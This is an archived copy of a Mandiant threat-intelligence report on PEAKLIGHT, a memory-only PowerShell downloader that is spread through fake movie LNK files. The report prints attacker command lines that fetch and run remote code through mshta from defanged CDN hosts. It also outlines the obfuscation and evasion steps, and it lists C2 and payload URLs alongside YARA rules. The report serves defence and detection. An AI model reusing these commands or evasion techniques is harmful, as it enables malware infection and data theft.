{
	"id": "f7f9432e-c32d-4a1f-98a5-31e4281c2184",
	"created_at": "2026-04-06T00:10:17.623324Z",
	"updated_at": "2026-04-10T03:21:50.809041Z",
	"deleted_at": null,
	"sha1_hash": "f3be817749169c31ba0cf255f3b63328ec9d79c5",
	"title": "PEAKLIGHT: Decoding the Stealthy Memory-Only Malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3241531,
	"plain_text": "PEAKLIGHT: Decoding the Stealthy Memory-Only Malware\r\nBy Mandiant\r\nPublished: 2024-08-22 · Archived: 2026-04-05 12:47:07 UTC\r\nWritten by: Aaron Lee, Praveeth DSouza\r\nTL;DR\r\nMandiant identified a new memory-only dropper using a complex, multi-stage infection process. This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being\r\ntracked as PEAKLIGHT.\r\nOverview\r\nMandiant Managed Defense identified a memory-only dropper and downloader delivering malware-as-a-service\r\ninfostealers. During our investigation, Mandiant observed the malware download payloads such as LUMMAC.V2\r\n(LUMMAC2), SHADOWLADDER, and CRYPTBOT. Mandiant identified the initial infection vector as a\r\nMicrosoft Shortcut File (LNK) that connects to a content delivery network (CDN) hosting an obfuscated memory-only JavaScript dropper. Analysis of the payload revealed that it executes a PowerShell downloader script on the\r\nhost. Mandiant named this final downloader PEAKLIGHT.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 1 of 18\n\nFigure 1: Infection chain\r\nInfection Chain\r\nStage 1: Movie Lures; A Blast from the Past \r\nIn recent investigations, Mandiant identified victims downloading malicious ZIP files disguised as pirated movies.\r\nThese archives contained a malicious Microsoft Shortcut File (LNK) following the filename schema seen in\r\nFigure 2:\r\n* Video_mp4_1080p_x264.zip -\u003e The Movie (HD).lnk\r\n* Video_mp4_[1080p].zip -\u003e Full Movie 1080p HD.lnk\r\n* @!Movie_HD_1080p_mp4_@!.zip -\u003e Full Movie HD (1080p).lnk\r\n* mp4_Full_Video_HD_1080p@!.zip -\u003e Full Video (HD) mp4.lnk\r\nFigure 2: Initial infection\r\nDuring an associated investigation within a client environment, Mandiant identified anomalous outbound network\r\nactivity to the IP address 62.133.61[.]56. 
The XML page seen in Figure 3 was subsequently discovered at the URL\r\nhxxp://62.133.61[.]56/Downloads.\r\nOf particular interest was this snippet from the XML markup, seen in Figure 4.\r\n\u003cD:href\u003e/Downloads/Full%20Video%20HD%20%281080p%29.lnk\u003c/D:href\u003e\r\n \u003cD:propstat\u003e\r\n \u003cD:prop\u003e\r\n \u003cD:resourcetype\u003e\u003c/D:resourcetype\u003e\r\n \u003cD:displayname\u003eFull Video HD (1080p).lnk\u003c/D:displayname\u003e\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 2 of 18\n\n\u003cD:getcontenttype\u003eapplication/octet-stream\u003c/D:getcontenttype\u003e\r\n \u003cD:getetag\u003e\"17d6b3e5205a12a0460\"\u003c/D:getetag\u003e\r\n \u003cD:getcontentlength\u003e1120\u003c/D:getcontentlength\u003e\r\n \u003cD:getlastmodified\u003eFri, 07 Jun 2024 11:01:44 GMT\u003c/D:getlastmodified\u003e\r\n \u003cD:supportedlock\u003e\r\nFigure 4: Forwarding mechanism\r\nBased on the contents of Figure 4, this code may have served as a redirect or forwarding mechanism for the URL\r\nhxxp://62.133.61[.]56/Downloads/Full Video HD (1080p).lnk (MD5: 62f20122a70c0f86a98ff14e84bcc999).\r\nMandiant subsequently acquired this file and determined it was a LNK file configured with a media file icon\r\n(Figure 5).\r\nFigure 5: LNK file configured with a media file icon\r\nLNK files are a common tactic used by threat actors to trick unsuspecting users into unknowingly executing\r\nmalware. These files can be disguised as legitimate documents or programs, making them effective for hiding in\r\nplain sight.\r\nAt this stage in the investigation, Mandiant identified different command variations within the parameters of the\r\nLNK file.\r\nVariation 1\r\nThe parameters portion of the LNK file was configured to leverage the legitimate Microsoft utility forfiles.exe to\r\nsearch for the file win.ini and execute a PowerShell script. 
Mandiant observed the execution of the following\r\ncommand (Figure 6):\r\nforfiles.exe /p C:\\Windows /m win.ini /c \"powershell .\r\nmshta https://nextomax.b-cdn[.]net/nexto\"\r\nFigure 6: Initial PowerShell script variation 1\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 3 of 18\n\nThis command:\r\nUses the /p command switch for forfiles.exe to set the designated file search path to C:\\Windows.\r\nUses the /m command switch to look for files matching the name win.ini. Then, for each match (though on\r\ntypical Windows installations there will only be one):\r\nStarts powershell.exe with configurations to load a localized or dot-sourced script, which is\r\nsignified by the \".\" (in this case, the output generated by the rest of the command-line parameters).\r\nRetrieves a second-stage payload from the URL hxxps://nextomax.b-cdn[.]net/nexto.\r\nExecutes the retrieved payload via mshta.exe.\r\nAfter executing this LNK file, Windows Media Player was opened on the affected host, and a video of a\r\nprominent film studio's opening logo reel played automatically.\r\nThis video file was simply called video.mp4 (MD5: 91423dd4f34f759aaf82aa73fa202120) and presumably\r\nserved as a \"cover\" video to attempt to alleviate suspicions that the affected host had, in reality, been infected with\r\nmalware.\r\nVariation 2\r\nIn a different investigation, Mandiant observed the parameters portion of the LNK file initiated a PowerShell\r\ncommand that employed asterisks (*) as wildcards to launch mshta.exe to discreetly run malicious code retrieved\r\nfrom a remote server.\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"\r\n.(gp -pa 'HKLM:\\SOF*\\Clas*\\Applications\\msh*e').\r\n('PSChildName')hxxps://potexo.b-cdn[.]net/potexo\r\nFigure 7: Initial PowerShell script variation 2\r\nThis command:\r\nRuns a script signified by the dot sourcing operator \".\".\r\nUses the Get-ItemProperty (gp) 
to point to the Mshta registry hive and psChildName to specify the\r\nobject, mshta.exe.\r\nRetrieves the second-stage payload from the URL hxxps://potexo.b-cdn[.]net/potexo and executes via\r\nmshta.exe.\r\nThe attackers employed the following evasion techniques to further cover their tracks:\r\nSystem Binary Proxy Execution: By using mshta.exe, the attackers execute malicious code directly from\r\na remote server, bypassing application control solutions and browser security settings. \r\nContent Delivery Network Abuse: The attackers took advantage of a reputable content delivery network\r\n(Bunny CDN) to host their malicious payloads. This abuse of trust associated with CDNs allowed them to\r\ncircumvent security filters that might not scrutinize traffic from known, trusted sources.\r\nBoth variations utilize MITRE ATT\u0026CK® Technique T1218.005: System Binary Proxy Execution: Mshta.\r\nStage 2: JavaScript Dropper\r\nAs Figure 8 shows, analysis of the HTML file cached on the CDN revealed that it contained an obfuscated memory-only JavaScript\r\ndropper.\r\nFigure 8: JavaScript dropper layer 1\r\nThe script begins by assigning decimal-encoded ASCII characters to randomly named variables. The\r\nString.fromCharCode() function is then used to convert the decimal-encoded characters back into their\r\ncorresponding ASCII characters to decode the JavaScript dropper embedded within the script.\r\nMandiant identified an embedded payload after decoding the JavaScript dropper, seen in Figure 9.\r\nFigure 9: JavaScript dropper layer 2\r\nThe script in Figure 9 carries out the following actions:\r\n1. 
Decoding Function (wAJ)\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 5 of 18\n\nThe function receives an array of numbers, decodes each by subtracting 619, and then converts the result to\r\nits corresponding character using String.fromCharCode(). These characters are then combined to produce\r\nthe final, decoded string, which is returned by the function.\r\n2. Payload (KbX, YmD)\r\nThe variables KbX and YmD contain obfuscated data, which is decoded by the wAJ function.\r\n3. ActiveXObject\r\nThe script employs a decoded variable YmD, which resolves to Wscript.shell, to create a new ActiveX\r\nobject. This object grants the script system-level privileges to execute commands.\r\n4. IMD.Run\r\nExecutes the decoded KbX command.\r\nParameters:\r\n0: This parameter instructs the command to run in a hidden window, keeping its actions concealed\r\nfrom the user.\r\ntrue: This parameter ensures the script waits for the command to complete its execution before\r\nmoving on to any subsequent steps.\r\nThe payload (KbX) was abbreviated to maintain a concise presentation.\r\nNote: Mandiant used this CyberChef recipe to successfully decode the obfuscated JavaScript dropper.\r\nVariation 1: Hex-Encoded Payload\r\nFigure 10: PowerShell hex-encoded payload\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 6 of 18\n\nThe first command conceals its malicious payload within a string of hexadecimal characters. 
The execution\r\nprocess adheres to the following sequence:\r\nStealthy PowerShell Launch: The command initiates PowerShell in a hidden window ( -w 1 ), bypasses\r\nexecution restrictions ( -ep Unrestricted ), and skips loading user profiles ( -nop ), ensuring covert\r\noperations.\r\nHex to Byte Conversion: A custom function ( ffQiHkvB ) is defined to transform the hexadecimal string\r\ninto a byte array, a standard format for storing data.\r\nDecryption: The script creates an Advanced Encryption Standard (CBC mode) decryptor using a hex key.\r\nThe byte array is decrypted, revealing the actual PowerShell code.\r\nExecution: Finally, the decrypted PowerShell code is executed.\r\nNote: Mandiant decoded the payload using a custom CyberChef recipe.\r\nVariation 2: Base64-Encoded Payload\r\nFigure 11: PowerShell Base64-encoded payload\r\nThe second command follows a similar structure but with key differences: the malicious payload is encoded using\r\nBase64 instead of hexadecimal and is executed through a memory stream.\r\nStealth and Configuration: The initial steps to launch PowerShell in a hidden, unrestricted mode are the\r\nsame as in Variation 1.\r\nBase64 Decoding: Instead of a custom function, this variant directly uses PowerShell's built-in\r\nFromBase64String method to decode the payload. \r\nDecryption, Decompression, and Execution: The payload is decrypted using AES (ECB mode) with a\r\nBase64-encoded key. After decryption, the payload is decompressed into memory using GZIP, revealing\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 7 of 18\n\nthe PowerShell code, which is subsequently executed.\r\nStage 3: PEAKLIGHT; The PowerShell Downloader\r\nPEAKLIGHT is an obfuscated PowerShell-based downloader that checks for the presence of hard-coded\r\nfilenames and downloads files from a remote CDN if the files are not present. 
\r\nDuring our analysis, Mandiant identified the following key differences across the variations of the PEAKLIGHT\r\nscript:\r\nTarget Directory: \r\nVariation 1 downloads files to $env:AppData.\r\nVariation 2 downloads files to $env:ProgramData.\r\nExecution Logic: \r\nVariation 1 executes the first alphabetically sorted file in the archive. \r\nVariation 2 executes the first file found in the archive.\r\nFile Name: \r\nVariation 1 downloads files as L1.zip and L2.zip.\r\nVariation 2 downloads files as K1.zip and K2.zip. \r\nAdditional Actions: \r\nVariation 1 also downloads an image (video.mp4) and makes a request to a remote server. \r\nVariation 2 does not download an image file.\r\nNote: Mandiant decoded the obfuscated payload using a custom CyberChef recipe.\r\nVariation 1\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 8 of 18\n\nFigure 12: PEAKLIGHT variation 1\r\nThis PEAKLIGHT downloader is designed to execute the following tasks:\r\n1. znY: Writes data to a file.\r\n2. nbF: Extracts a ZIP archive and runs the first executable file inside.\r\n3. aXR: Downloads data from an obfuscated URL.\r\n4. jkg: Deobfuscates a string.\r\nMain Function (AsD)\r\nVideo Playback or Download: It checks if video.mp4 exists in the AppData folder. If it exists, it plays\r\nthe video. 
If not, it downloads the video from a specified URL, saves it as video.mp4 in the AppData\r\nfolder, and then plays it.\r\nImage Download: It downloads an image from https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png\r\nusing Invoke-WebRequest.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 9 of 18\n\nZIP File Handling:\r\nIt checks if L1.zip exists in the AppData folder.\r\nIf it exists, it extracts its contents to the AppData folder and runs the first executable file found\r\nwithin the ZIP.\r\nIf not, it downloads L1.zip from a specified URL, saves it in the AppData folder, extracts its\r\ncontents, and runs the first executable.\r\nIt repeats the same process for L2.zip.\r\nAnalysis of the PEAKLIGHT downloader outlined in Figure 12 revealed the following URIs:\r\nhttps://nextomax.b-cdn[.]net/video.mp4\r\nhttps://nextomax.b-cdn[.]net/L1.zip\r\nhttps://nextomax.b-cdn[.]net/L2.zip\r\nhttps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png \r\nVariation 2\r\nFigure 13: PEAKLIGHT variation 2\r\nThis PEAKLIGHT downloader is designed to deliver and execute additional payloads on a compromised system.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 10 of 18\n\nThe functions:\r\n1. qXF($EGa, $aQU): The purpose of this function is to write data to a file.\r\n2. Irl($EGa): Extracts a ZIP archive and runs an executable from it.\r\n3. OBs($BYu):  Downloads data from a URL.\r\n4. 
Fzl($XFW): Deobfuscates an array of numbers into a string (likely a URL).\r\nMain Execution (bSo function):\r\nDefines two ZIP file paths: K1.zip and K2.zip within the ProgramData directory.\r\nFor each of these ZIP files, it checks if they already exist.\r\nIf the file exists, it simply unzips it using the Irl function.\r\nIf the file is missing, it first uses the function Fzl to decode an obfuscated web address, then downloads the\r\nZIP file from that address using the function OBs. Finally, it unzips the downloaded file using the function\r\nIrl.\r\nAnalysis of the PEAKLIGHT downloader outlined in Figure 13 revealed the following URIs:\r\nhttps://potexo.b-cdn[.]net/K1.zip\r\nhttps://potexo.b-cdn[.]net/K2.zip\r\nAdditionally, Mandiant identified other PEAKLIGHT downloader samples connecting to various subdomains\r\nhosted on Bunny CDN. These samples will be discussed in more detail in the subsequent stage of analysis.\r\nStage 4: The Final Payload\r\nVariation 1: L1.zip and L2.zip\r\nHaving explored the initial stages of the PEAKLIGHT downloader's operation, our focus now shifts to the\r\npayload it delivers. As detailed in Variation 1 of Stage 3, this downloader was observed downloading three\r\nspecific files: L1.zip, L2.zip, and video.mp4. 
Mandiant successfully acquired and extracted the contents of the\r\nfiles, as seen in Table 1.\r\nDownload Extracted Content\r\nFilename: L2.zip\r\nHash: 307f40ebc6d8a207455c96d34759f1f3\r\nType: Archive\r\nFilename: Setup.exe\r\nHash: d8e21ac76b228ec144217d1e85df2693\r\nType: Win32 EXE\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 11 of 18\n\nFilename: L1.zip\r\nHash: a6c4d2072961e9a8c98712c46be588f8\r\nType: Archive\r\nFilename: LiteSkinUtils.dll\r\nHash: 059d94e8944eca4056e92d60f7044f14\r\nType: Win32 DLL\r\nFilename: Bentonite.cfg\r\nHash: e7c43dc3ec4360374043b872f934ec9e\r\nType: PNG\r\nFilename: Video.mp4\r\nHash: 91423dd4f34f759aaf82aa73fa202120\r\nType: Video\r\n \r\nTable 1: Variant 1 downloaded files and extracted archive content\r\n1. L2.zip contained the following:\r\nSetup.exe: This executable is a variant of the Cryptbot infostealer. Our analysis uncovered the\r\nfollowing embedded URLs:\r\n1. https://brewdogebar[.]com/code.vue\r\n2. http://gceight8vt[.]top/upload.php\r\n2. L1.zip contained the following:\r\nbentonite.cfg: This file contains malware configurations that are linked to the SHADOWLADDER\r\nmalware family.\r\nLiteSkinUtils.dll: It is a malicious component used by SHADOWLADDER malware to facilitate\r\nthe execution of its second-stage payload through dynamic-link library (DLL) side-loading.\r\n3. 
Video.mp4\r\nThis file appears to be a legitimate movie trailer, likely used as a decoy to deceive the victim into\r\nbelieving that the downloaded files are safe.\r\nVariation 2: K1.zip and K2.zip\r\nThe second variant of the PEAKLIGHT downloader, discussed in Variation 2 of Stage 3, was observed\r\ndownloading two archives: K1.zip and K2.zip.\r\nDownload Extracted Content\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 12 of 18\n\nFilename: K1.zip\r\nHash: b6b8164feca728db02e6b636162a2960\r\nType: Archive\r\nFilename: toughie.txt\r\nHash:\r\ndfdc331e575dae6660d6ed3c03d214bd\r\nType: data\r\nFilename: Aaaa.exe\r\nHash:\r\nb15bac961f62448c872e1dc6d3931016\r\nType: Win32 EXE\r\nFilename: WCLDll.dll\r\nHash:\r\n47eee41b822d953c47434377006e01fe\r\nType: Win32 DLL\r\nFilename:\r\nC:\\Users\\user\\AppData\\Local\\Temp\\erefgojgbu\r\nHash: d6ea5dcdb2f88a65399f87809f43f83c\r\nType: Win32 EXE\r\n \r\nFilename: K2.zip\r\nHash: 236c709bbcb92aa30b7e67705ef7f55a\r\nType: Archive\r\nFilename: Jfts.exe\r\nHash:\r\nb15bac961f62448c872e1dc6d3931016\r\nType: Win32 EXE\r\nTable 2: Variant 2 downloaded files and extracted archive content\r\n1. K1.zip contained the following:\r\ntoughie.txt: This file contained configurations related to the SHADOWLADDER malware.\r\naaaa.exe \u0026 WCLDll.dll: These binaries are DLL files that SHADOWLADDER patches to\r\nleverage their HTTP download functionality.\r\n2. K2.zip contained the following:\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/\r\nPage 13 of 18\n\nJfts.exe: This file is a renamed copy of the previously mentioned aaaa.exe.\r\nUpon execution, Jfts.exe loads the malicious WCLDll.dll from K1.zip. 
This DLL then leverages the \"More\r\nUtility\" (more.com) to stealthily drop two additional files:\r\n\\AppData\\Local\\Temp\\Hofla.au3 (MD5: c56b5f0201a3b3de53e561fe76912bfd): Identified as an\r\nAutoIt3.exe binary.\r\n\\AppData\\Local\\Temp\\erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c): Further analysis of this\r\nfile confirmed its association with the CRYPTBOT.AUTOIT malware.\r\nVariation 3: Additional PEAKLIGHT Variant\r\nFurther analysis has identified an additional PEAKLIGHT downloader variant employing distinct tactics. This\r\nvariant retrieves its payload, the archives K1.zip and K2.zip, from the domain matodown.b-cdn[.]net. A detailed\r\nbreakdown of the contents within these archives is presented in Table 3.\r\nDownload Extracted Content\r\nFilename: K1.zip\r\nHash: bb9641e3035ae8c0ab6117ecc82b65a1\r\nType: Archive\r\nFilename: cymophane.doc\r\nHash: f98e0d9599d40ed032ff16de242987ca\r\nType: ISO\r\nFilename: WebView2Loader.dll\r\nHash: 58c4ba9385139785e9700898cb097538\r\nType: Win32 DLL\r\nFilename: K2.zip\r\nHash: d7aff07e7cd20a5419f2411f6330f530\r\nType: Archive\r\nFilename: hgjke.exe\r\nHash: c047ae13fc1e25bc494b17ca10aa179e\r\nType: Win32 EXE\r\nFilename: AppData\\Local\\Temp\\oqnhustu\r\nHash: 43939986a671821203bf9b6ba52a51b4\r\nType: Win32 EXE\r\n \r\nTable 3: Variant 3 downloaded files and extracted archive content\r\n1. K1.zip contained the following:\r\ncymophane.doc: This file contained configurations related to the SHADOWLADDER malware.\r\nWebView2Loader.dll: This malicious DLL was observed to be dropped by the LummaC.V2\r\ninfostealer.\r\n2. 
K2.zip contained the following:\r\nHgjke.exe: Identified as a renamed copy of the legitimate \"JRiver Web Application\" executable.\r\nDuring dynamic analysis, hgjke.exe was observed loading the malicious WebView2Loader.dll.\r\nMandiant observed hgjke.exe utilize the comp.exe utility to drop two additional files:\r\nAppData\\Local\\Temp\\Ufa.au3 (MD5: c56b5f0201a3b3de53e561fe76912bfd): Identified as\r\nan AutoIt3 binary.\r\nAppData\\Local\\Temp\\oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4): Further\r\nanalysis confirmed this file to be consistent with the LummaC.V2 payload.\r\nConclusion\r\nPEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that\r\nchecks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will\r\nreach out to a CDN site and download the remotely hosted archive file and save it to disk. PEAKLIGHT was\r\nobserved downloading payloads such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT. The malware\r\ndevelopers used several different obfuscation and evasion techniques, including system binary proxy execution\r\nand CDN abuse. Mandiant identified different variations of the PEAKLIGHT downloader, each with its own\r\nunique characteristics.\r\nWe encourage security researchers to remain vigilant and share any insights or similar malware samples they\r\nencounter. 
By working together and fostering open communication within the cybersecurity community, we can\r\nbetter understand the evolving threat landscape and strengthen our collective defenses against future attacks.\r\nProtect and scan your environment against the indicators of compromise and YARA rules in the following section.\r\nIf you suspect that your environment may have been compromised, contact our Incident Response team for\r\nassistance.\r\nAcknowledgements\r\nWe would like to thank Adrian McCabe for assistance with LNK research and subject matter expertise, Raymond\r\nLeong for the initial analysis of malware stages and payloads, and the Mandiant Research Team for their valuable\r\nfeedback.\r\nDetections\r\nYARA Rules\r\nrule M_AES_Encrypted_payload {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule is designed to detect on events that\r\nexhibit indicators of utilizing AES encryption for payload obfuscation.\"\r\n target_entity = \"Process\"\r\n strings:\r\n $a = /(\\$\\w+\\.Key(\\s|)=((\\s|)(\\w+|));|\\$\\w+\\.Key(\\s|)=(\\s|)\\w+\\('\\w+'\\);)/\r\n $b = /\\$\\w+\\.IV/\r\n $c = /System\\.Security\\.Cryptography\\.(AesManaged|Aes)/\r\n condition:\r\n all of them\r\n}\r\nrule M_Downloader_PEAKLIGHT_1 {\r\n meta:\r\n mandiant_rule_id = \"e0abae27-0816-446f-9475-1987ccbb1bc0\"\r\n author = \"Mandiant\"\r\n category = \"Malware\"\r\n description = \"This rule is designed to detect on events related to peaklight.\r\nPEAKLIGHT is an obfuscated PowerShell-based downloader which checks for\r\nthe presence of hard-coded filenames and downloads files from a remote CDN\r\nif the files are not present.\"\r\n family = \"Peaklight\"\r\n platform = \"Windows\"\r\n strings:\r\n $str1 = /function\\s{1,16}\\w{1,32}\\(\\$\\w{1,32},\\s{1,4}\\$\\w{1,32}\\)\\{\\[IO\\.File\\]::WriteAllBytes\\(\\$\\w{1,32},\\s{1,4}\\$\\w{1,32}\\)\\}/ 
ascii wide\r\n $str2 = /Expand-Archive\\s{1,16}-Path\\s{1,16}\\$\\w{1,32}\\s{1,16}-DestinationPath/ ascii wide\r\n $str3 = /\\(\\w{1,32}\\s{1,4}@\\((\\d{3,6},){3,12}/ ascii wide\r\n $str4 = \".DownloadData(\" ascii wide\r\n $str5 = \"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12\" ascii wide\r\n $str6 = /\\.EndsWith\\((([\"']\\.zip[\"'])|(\\(\\w{1,32}\\s{1,16}@\\((\\d{3,6},){3}\\d{3,6}\\)\\)))/ ascii wide\r\n $str7 = \"Add-Type -Assembly System.IO.Compression.FileSystem\" ascii wide\r\n $str8 = \"[IO.Compression.ZipFile]::OpenRead\"\r\n condition:\r\n 4 of them and filesize \u003c 10KB\r\n}\r\nIndicators of Compromise (IOCs)\r\nNetwork-Based IOCs\r\nPEAKLIGHT NBIs:\r\nhxxps://fatodex.b-cdn[.]net/fatodex\r\nhxxps://matodown.b-cdn[.]net/matodown\r\nhxxps://potexo.b-cdn[.]net/potexo\r\nLUMMAC.V2 C2s:\r\nrelaxtionflouwerwi[.]shop\r\ndeprivedrinkyfaiir[.]shop\r\ndetailbaconroollyws[.]shop\r\nmesstimetabledkolvk[.]shop\r\nconsiderrycurrentyws[.]shop\r\nunderstanndtytonyguw[.]shop\r\npatternapplauderw[.]shop\r\nhorsedwollfedrwos[.]shop\r\ntropicalironexpressiw[.]shop\r\nCRYPTBOT C2s:\r\nhxxp://gceight8vt[.]top/upload.php\r\nhxxps://brewdogebar[.]com/code.vue\r\nSHADOWLADDER:\r\nhxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk\r\nhxxps://fatodex.b-cdn[.]net/K1.zip\r\nhxxps://fatodex.b-cdn[.]net/K2.zip\r\nhxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png\r\nhxxps://matodown.b-cdn[.]net/K1.zip\r\nhxxps://matodown.b-cdn[.]net/K2.zip\r\nhxxps://nextomax.b-cdn[.]net/L1.zip\r\nhxxps://nextomax.b-cdn[.]net/L2.zip\r\nhxxps://potexo.b-cdn[.]net/K1.zip\r\nhxxps://potexo.b-cdn[.]net/K2.zip\r\nHost-Based IOCs\r\nCRYPTBOT:\r\nerefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c)\r\nL2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3)\r\nSеtup.exe (MD5: d8e21ac76b228ec144217d1e85df2693)\r\nLUMMAC.V2:\r\noqnhustu 
(MD5: 43939986a671821203bf9b6ba52a51b4)\r\nWebView2Loader.dll (MD5: 58c4ba9385139785e9700898cb097538)\r\nPEAKLIGHT:\r\nDownloader (MD5: 95361f5f264e58d6ca4538e7b436ab67)\r\nDownloader (MD5: b716a1d24c05c6adee11ca7388b728d3)\r\nSHADOWLADDER:\r\nAaaa.exe (MD5: b15bac961f62448c872e1dc6d3931016)\r\nbentonite.cfg (MD5: e7c43dc3ec4360374043b872f934ec9e)\r\ncymophane.doc (MD5: f98e0d9599d40ed032ff16de242987ca)\r\nK1.zip (MD5: b6b8164feca728db02e6b636162a2960)\r\nK1.zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1)\r\nK2.zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a)\r\nK2.zip (MD5: d7aff07e7cd20a5419f2411f6330f530)\r\nL1.zip (MD5: a6c4d2072961e9a8c98712c46be588f8)\r\nLiteSkinUtils.dll (MD5: 059d94e8944eca4056e92d60f7044f14)\r\ntoughie.txt (MD5: dfdc331e575dae6660d6ed3c03d214bd)\r\nWCLDll.dll (MD5: 47eee41b822d953c47434377006e01fe)\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware/"
	],
	"report_names": [
		"peaklight-decoding-stealthy-memory-only-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434217,
	"ts_updated_at": 1775791310,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f3be817749169c31ba0cf255f3b63328ec9d79c5.pdf",
		"text": "https://archive.orkl.eu/f3be817749169c31ba0cf255f3b63328ec9d79c5.txt",
		"img": "https://archive.orkl.eu/f3be817749169c31ba0cf255f3b63328ec9d79c5.jpg"
	}
}